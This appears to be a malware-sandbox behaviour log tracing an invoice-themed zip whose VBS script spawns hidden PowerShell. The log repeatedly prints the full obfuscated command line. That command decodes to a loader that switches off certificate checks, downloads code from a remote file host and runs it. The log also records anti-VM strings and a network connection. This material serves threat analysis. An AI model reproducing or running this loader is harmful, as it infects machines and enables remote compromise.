Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^^^|%{[char]($_/3)})-join'') ^^^| ^^^&($kwXZtAwej) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^|%{[char]($_/3)})-join'') ^| ^&($kwXZtAwej) "
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^^^|%{[char]($_/3)})-join'') ^^^| ^^^&($kwXZtAwej) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^|%{[char]($_/3)})-join'') ^| ^&($kwXZtAwej) "Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: C70000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: 2B90000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: EF0000 memory commit | memory reserve | memory write watchJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeWindow / User API: threadDelayed 485Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeWindow / User API: threadDelayed 9512Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3193Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6437Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6792Thread sleep count: 485 > 30Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6792Thread sleep time: -242500s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6792Thread sleep count: 9512 > 30Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6792Thread sleep time: -4756000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6772Thread sleep count: 3193 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6760Thread sleep count: 6437 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3752Thread sleep count: 31 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3752Thread sleep time: -28592453314249787s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\unarchiver.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: wscript.exe, 0000000B.00000002.2905465351.0000000005670000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(d
Source: cmd.exe, 00000009.00000002.2903539082.0000000002D07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_
Source: wscript.exe, 0000000B.00000002.2903297378.00000000028FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3
Source: wscript.exe, 0000000B.00000002.2905465351.0000000005698000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 149.56.240.131 443Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab" "C:\Users\user\Downloads\faktura_FV2025020637756.zip"Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^^^|%{[char]($_/3)})-join'') ^^^| ^^^&($kwXZtAwej) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^|%{[char]($_/3)})-join'') ^| ^&($kwXZtAwej) "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c "echo $($kwxztawej = $('{4}{10}{9}' -f $('vglbipiqrxeu'.tochararray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^^^|%{[char]($_/3)})-join'') ^^^| ^^^&($kwxztawej) | c:\windows\syswow64\windowspowershell\v1.0\powershell.exe -window hidden -c -"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $($kwxztawej = $('{4}{10}{9}' -f $('vglbipiqrxeu'.tochararray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^|%{[char]($_/3)})-join'') ^| ^&($kwxztawej) "
